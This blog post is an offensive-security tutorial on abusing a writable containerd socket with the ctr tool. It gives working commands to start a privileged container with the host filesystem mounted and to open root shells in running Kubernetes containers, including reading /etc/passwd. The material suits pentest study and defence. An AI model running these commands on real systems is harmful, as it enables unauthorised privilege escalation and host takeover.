- The containerd socket
- The ctr tool
- List namespaces
- List running containers in namespace
- Running our own containers
- Executing code in running containers
- Deleting a container
A common technique used by attackers in containerised environments is exploitation of the container runtime socket to move laterally or escalate privileges. Attackers can access this socket when it is exposed directly inside an exploited container, or when the attacker can access the containing host's filesystem, usually with root privileges.
Once the attacker can access the socket file with write permissions, they can then communicate with it in various ways to run new containers or execute code in existing ones. The specifics of how this is done differ depending on the container runtime in use. If the runtime is Docker, there is a lot of available information on how to use the socket offensively. Exploitation with commonly available tools like curl is quite straightforward because the Docker API uses REST, allowing you to perform container admin tasks using plain text HTTP requests.
One example of an article on how to exploit the Docker socket using this approach is here.
Another container runtime that's seeing increasing use is containerd, which has a different and more complex API than Docker, and there isn't much publicly available information on how to exploit its socket. Given that I've spent a bit of time playing with this myself, I thought I would share how to do it over a few blog posts. This post will cover how to use the ctr admin tool to perform the exploitation, and a future post will discuss how to do the same with curl.
The containerd socket
The containerd socket has a default location of /var/run/containerd/containerd.sock and is a Unix domain socket file that is normally only accessible by the root user. (If you're not familiar with how Unix domain sockets work on Linux, think of them as being like a TCP socket located at a named path on disk, which you can write to or read from using regular filesystem operations in order to communicate with "network" servers or clients that are doing the same.) If you can manage to get write access to this socket file as a non-root user, it gives you the ability to escalate privileges to root on the host, as well as to access and manipulate any running container managed by the daemon.
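As a quick first triage step from a foothold, it's worth checking whether the current user can actually reach the socket before pulling any tooling across. A minimal sketch (the path below is the default; adjust it if the socket is mounted elsewhere, such as under /host):

```shell
# Check whether the containerd socket exists and is writable by the
# current user. A writable socket means the full containerd API is
# available to us.
SOCK=/var/run/containerd/containerd.sock
if [ -S "$SOCK" ] && [ -w "$SOCK" ]; then
    echo "$SOCK is writable - containerd API is reachable"
else
    echo "$SOCK is missing or not writable by this user"
fi
```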
Most communication with the containerd runtime by orchestration tools such as Kubernetes and administration tools like ctr is sent through this socket file, which uses the gRPC protocol for its messaging. gRPC uses Protobuf messages sent over HTTP/2, which makes it a little challenging to talk to using command line tools commonly available in many container images, like curl or wget, although it is possible, as we will see in a future post. Given the overhead of the "manual" approach, however, it's preferable to use actual containerd admin tools where this is an option, and that's what I will discuss in this post.
The ctr tool
The ctr tool is the "unsupported" command line admin tool for the containerd runtime and is provided within the containerd release archive. If you can get this tool onto a system or container that can access the containerd socket, it makes the process of exploiting the runtime very straightforward.
The tool will by default try to access the socket at its default location of /var/run/containerd/containerd.sock; however, it's possible to override this using the --address parameter, and I'll specifically include it in the examples below.
Here's a simple example of using the tool to confirm that communication with the socket is working, by requesting version information from the server.
$ sudo ctr --address /var/run/containerd/containerd.sock version
Client:
Version: 1.7.24
Revision: 88bf19b2105c8b17560993bee28a01ddc2f97182
Go version: go1.22.9
Server:
Version: 1.7.24
Revision: 88bf19b2105c8b17560993bee28a01ddc2f97182
UUID: cc501e78-a8ad-4eff-8c02-58003ac69353
List namespaces
A useful first step when communicating with the containerd socket is listing the namespaces in use by the containerd runtime, because containers of interest to us may not be visible unless we get this parameter correct in future calls we make to the API. We can list namespaces like so:
$ sudo ctr --address /var/run/containerd/containerd.sock ns ls
NAME LABELS
buildkit
default
k8s.io
Since the machine I am running this on happens to be a Kubernetes node, we can see the k8s.io namespace in the list above. All the containers run by Kubernetes on this particular node will be accessible via this namespace only, and we will need to include the -n k8s.io switch in all future commands to see them.
It's also likely that a system with this particular namespace will NOT be running containers in any other namespaces. The default namespace is the one that will be used by default, and the one that will be referenced by any command execution that doesn't specify a particular namespace.
List running containers in namespace
The next thing we are going to do is list the running containers in the Kubernetes (k8s.io) namespace, which we do like so:
$ sudo ctr --address /var/run/containerd/containerd.sock -n k8s.io containers list
CONTAINER IMAGE RUNTIME
01a91532d97f8f7162c477dd1e402520d313e9c4333827d74a93cde25dddc1cc registry.k8s.io/pause:3.6 io.containerd.runc.v2
05536e2ec91d018cdb4edac21ab613b22f0755721e082c99f81b87516bce60ec registry.k8s.io/pause:3.6 io.containerd.runc.v2
0894b4942001821ad9c36949ae7c15fc2dd9b54bf6e5d531b6e5b03e6f5e313c docker.io/calico/cni:v3.25.0 io.containerd.runc.v2
[SNIP]
3373c8e99b9381b150d30998203cbb6593f1e25b4c30a61f16669f9f8b5d8694 docker.io/library/springsaml:latest io.containerd.runc.v2
[SNIP]
The output of the above is a very long list of running containers with their container ID and associated image name (I've "snipped" the output in the interests of space). Given that these are Kubernetes containers, the container IDs are very unhelpfully named using hashes, but the IMAGE value can be somewhat useful in identifying which items are worth a closer look. In the above I've made sure to include the listing for a container running the image docker.io/library/springsaml:latest, which we will examine further in later commands.
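On a busy node, most entries in this list will be Kubernetes infrastructure (pause containers, CNI plugins and the like). A convenience sketch for hiding those so that application workloads stand out - the exclusion patterns are assumptions that will vary per cluster, and the sample lines below reproduce the earlier output so the filter can be shown standalone (in practice you would pipe the live `containers list` output through the same grep):

```shell
# Filter a 'containers list' style listing to hide common
# infrastructure images (pause, CNI). Patterns are examples only.
listing='01a91532d97f8f registry.k8s.io/pause:3.6 io.containerd.runc.v2
0894b494200182 docker.io/calico/cni:v3.25.0 io.containerd.runc.v2
3373c8e99b9381 docker.io/library/springsaml:latest io.containerd.runc.v2'
printf '%s\n' "$listing" | grep -vE 'pause|calico'
# prints only the springsaml line
```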
To get a lot more information about a given container, to see if it's something we are interested in, we can run a command like the following, which references the container ID from the docker.io/library/springsaml:latest entry in the output above.
$ sudo ctr --address /var/run/containerd/containerd.sock -n k8s.io containers info 3373c8e99b9381b150d30998203cbb6593f1e25b4c30a61f16669f9f8b5d8694
{
"ID": "3373c8e99b9381b150d30998203cbb6593f1e25b4c30a61f16669f9f8b5d8694",
"Labels": {
"io.cri-containerd.kind": "container",
"io.kubernetes.container.name": "springsaml",
"io.kubernetes.pod.name": "springsaml-86df7bc9c5-zqgn8",
"io.kubernetes.pod.namespace": "default",
"io.kubernetes.pod.uid": "cc5f0b97-32f4-41fb-8182-4d2ea0ab8130"
},
"Image": "docker.io/library/springsaml:latest",
"Runtime": {
"Name": "io.containerd.runc.v2",
"Options": {
"type_url": "containerd.runc.v1.Options",
"value": "SAE="
}
},
[SNIP]
We can see from the above "snipped" output that this gives us a lot more information on the container, including some labels that allow us to identify associated Kubernetes parameters. We also get various metadata and environment variables associated with the container (excluded from the output above).
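Because the info output is JSON, it pipes cleanly into a parser. A hedged convenience one-liner for mapping a container ID back to its pod (assumes python3 is available; the label keys are the standard CRI ones visible in the output above). The sample JSON below is taken from the earlier output so the snippet runs standalone - in practice you would pipe the live `containers info` output into the same python3 command:

```shell
# Pull the Kubernetes pod name and namespace out of the Labels block
# of 'containers info' JSON output.
info='{"Labels": {"io.kubernetes.pod.name": "springsaml-86df7bc9c5-zqgn8", "io.kubernetes.pod.namespace": "default"}}'
printf '%s' "$info" | python3 -c 'import json, sys
labels = json.load(sys.stdin)["Labels"]
print(labels["io.kubernetes.pod.name"], labels["io.kubernetes.pod.namespace"])'
# prints: springsaml-86df7bc9c5-zqgn8 default
```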
Running our own containers
To run our own containers, we need to know what container image to use. The "correct" image obviously depends on what we want to do with the container, but if we just want to achieve the common attacker scenario of running a privileged container with a host filesystem mount, almost any regular (non-cut-down) image will do. If we can find a suitable container image already available locally, this saves us the step of retrieving one, so let's check for a simple nginx image in the locally stored list. We can do this by running image ls and grepping the output like so:
$ sudo ctr --address /var/run/containerd/containerd.sock -n k8s.io image ls | grep nginx
docker.io/library/nginx:1.14.2 application/vnd.docker.distribution.manifest.list.v2+json sha256:f7988fb6c02e0ce69257d9bd9cf37ae20a60f1df7563c3a2a6abe24160306b8d 42.6 MiB linux/386,linux/amd64,linux/arm/v7,linux/arm64/v8,linux/ppc64le,linux/s390x
If we don't find anything suitable for our purposes locally, we can always image pull something to get what we need, but in this case the image above is fine.
The command example below shows how we can use this nginx image to run a privileged container with the host's filesystem mounted at /host.
$ sudo ctr --address /var/run/containerd/containerd.sock -n k8s.io run --privileged --mount 'type=bind,src=/,dst=/host,options=rbind:rw' -d 'docker.io/library/nginx:1.14.2' nginx
No output from the command here is generally a good sign, but we can confirm that the container was correctly created by listing containers and grepping for nginx (the container ID we specified in the above command).
$ sudo ctr --address /var/run/containerd/containerd.sock -n k8s.io container ls | grep nginx
3bd8e95274f34f1ecf0b11e19f52127361327742e40ae707ac5613f1365f2e71 docker.io/library/nginx:1.14.2 io.containerd.runc.v2
8ebece262e1762688c8f8adf80fe6d017e2043523a0d74f5812530b38524e149 docker.io/library/nginx:1.14.2 io.containerd.runc.v2
nginx docker.io/library/nginx:1.14.2 io.containerd.runc.v2
Our newly created container can be seen in the output above, standing out because its container ID is not a long hash value.
Executing code in running containers
Now let's look at how to execute code in running containers. We will do this both in one of the already running containers and in our newly created one.
First, let's do this in the existing container we looked at earlier - the one with ID 3373c8e99b9381b150d30998203cbb6593f1e25b4c30a61f16669f9f8b5d8694.
If we want to run a single command inside this container and get the output, we can do so as follows (running cat /etc/passwd):
$ sudo ctr --address /var/run/containerd/containerd.sock -n k8s.io task exec --exec-id catpwd 3373c8e99b9381b150d30998203cbb6593f1e25b4c30a61f16669f9f8b5d8694 cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
If we want an interactive shell into the container, we add the -t switch to allocate a TTY and run /bin/bash instead.
$ sudo ctr --address /var/run/containerd/containerd.sock -n k8s.io task exec -t --exec-id catpwd 3373c8e99b9381b150d30998203cbb6593f1e25b4c30a61f16669f9f8b5d8694 /bin/bash
root@springsaml-86df7bc9c5-zqgn8:/app# hostname
springsaml-86df7bc9c5-zqgn8
root@springsaml-86df7bc9c5-zqgn8:/app#
Now let's do the same in our nginx container that we created earlier.
$ sudo ctr --address /var/run/containerd/containerd.sock -n k8s.io task exec -t --exec-id catpwd nginx /bin/bash
root@kubecontainer:/# ls /host
bin boot dev etc home lib lib32 lib64 libx32 lost+found media mnt opt proc root run sbin snap srv swap.img sys tmp usr var
In the above, we see that the container is running as root and that the host filesystem is mounted at /host, just as we specified when we created it.
Now, while these particular examples of executing code in containers worked fine, it's worth diving into some more detail on how this works, because there are some details under the hood that can cause problems for us in certain situations.
First of all, the stdin, stdout and stderr channels of the tasks/processes created in the container are NOT carried by the API itself. Instead, they are specified in the form of named pipe (FIFO) files that the calling application (in this case ctr) needs to create and handle communication with.
What's more, when using ctr, the ctr tool and the containerd daemon need to use the same filenames for each of these pipes. This is a problem when the two applications (or the systems running them) don't share the same root filesystem, which can happen when we are accessing the socket via a mount within a container (the most likely scenario where exploitation of this socket will actually be useful).
In these cases, to directly access these process handles using ctr, we need to use a shared section of the filesystem that both client and server can access via the same named path, and inform the ctr tool of this path using the --fifo-dir switch.
Let's take an example where we are running ctr from within a compromised container where the host's root filesystem is mounted at /host. In this case (assuming we don't just chroot within the container), the containerd socket is being accessed from the path /host/run/containerd/containerd.sock. To make an interactive shell like the example above work, we can create a path /tmp/offsec on the host filesystem (by creating /host/tmp/offsec in our container) and then symbolically link this path to the same path /tmp/offsec in the container. Then we exec the task pointing to /host/run/containerd/containerd.sock as the socket address and /tmp/offsec as the FIFO path.
An example of commands to achieve this would look something like the following:
$ mkdir /host/tmp/offsec
$ ln -s /host/tmp/offsec /tmp/offsec
$ ctr --address /host/run/containerd/containerd.sock -n k8s.io task exec -t --exec-id catpwd --fifo-dir /tmp/offsec 3373c8e99b9381b150d30998203cbb6593f1e25b4c30a61f16669f9f8b5d8694 /bin/bash
Another factor to pay attention to is the --exec-id parameter. This is a mandatory parameter that we have to provide on each use of this command, and it can be set to any string value. The reason for this parameter is that the exec operations we have been performing actually involve a number of different underlying API calls - one to create the task (define the process details), another to start it (run the process), and another to remove the task once it's no longer needed. All of these steps are tied together via their associated API calls using a common exec-id.
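As a rough sketch, the lifecycle that ctr drives for each exec looks something like the following (method names paraphrased from the containerd tasks gRPC service; this is a simplification, not the exact wire traffic):

```
Exec(container_id, exec_id, process_spec)   -> define the new process
Start(container_id, exec_id)                -> actually run it
Wait(container_id, exec_id)                 -> collect the exit status
DeleteProcess(container_id, exec_id)        -> clean up, freeing exec_id
```

This is also why reusing an exec-id only fails when an earlier task with that ID was never cleaned up - the final delete step is what frees the ID for reuse.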
When we run commands via the ctr tool, we usually don't need to care too much about this unless there's an error, so we can run multiple subsequent (but not simultaneous) commands using the same exec-id without a problem. However, if there's a cleanup problem with a task run with ctr, or when we make the API calls directly ourselves, we will get an error message when we try to create a task with an exec-id that already exists. The error message will be similar to id catpwd: already exists.
If we happen to "break" any tasks, we can clean them up with ctr as in the following example, which is for a broken task catpwd in container 3373c8e99b9381b150d30998203cbb6593f1e25b4c30a61f16669f9f8b5d8694:
$ sudo ctr --address /var/run/containerd/containerd.sock -n k8s.io tasks delete 3373c8e99b9381b150d30998203cbb6593f1e25b4c30a61f16669f9f8b5d8694 --exec-id catpwd
Deleting a container
Now let's clean up the container we created earlier. This involves stopping it (killing its associated task) and then deleting the container, like so.
$ sudo ctr --address /var/run/containerd/containerd.sock -n k8s.io task kill nginx
$ sudo ctr --address /var/run/containerd/containerd.sock -n k8s.io container delete nginx
Now we confirm that it's gone.
$ sudo ctr --address /var/run/containerd/containerd.sock -n k8s.io container ls | grep nginx
3bd8e95274f34f1ecf0b11e19f52127361327742e40ae707ac5613f1365f2e71 docker.io/library/nginx:1.14.2 io.containerd.runc.v2
8ebece262e1762688c8f8adf80fe6d017e2043523a0d74f5812530b38524e149 docker.io/library/nginx:1.14.2 io.containerd.runc.v2
That covers the basic containerd exploitation steps using the ctr tool. I will do a follow-up post soon on performing these same tasks using curl.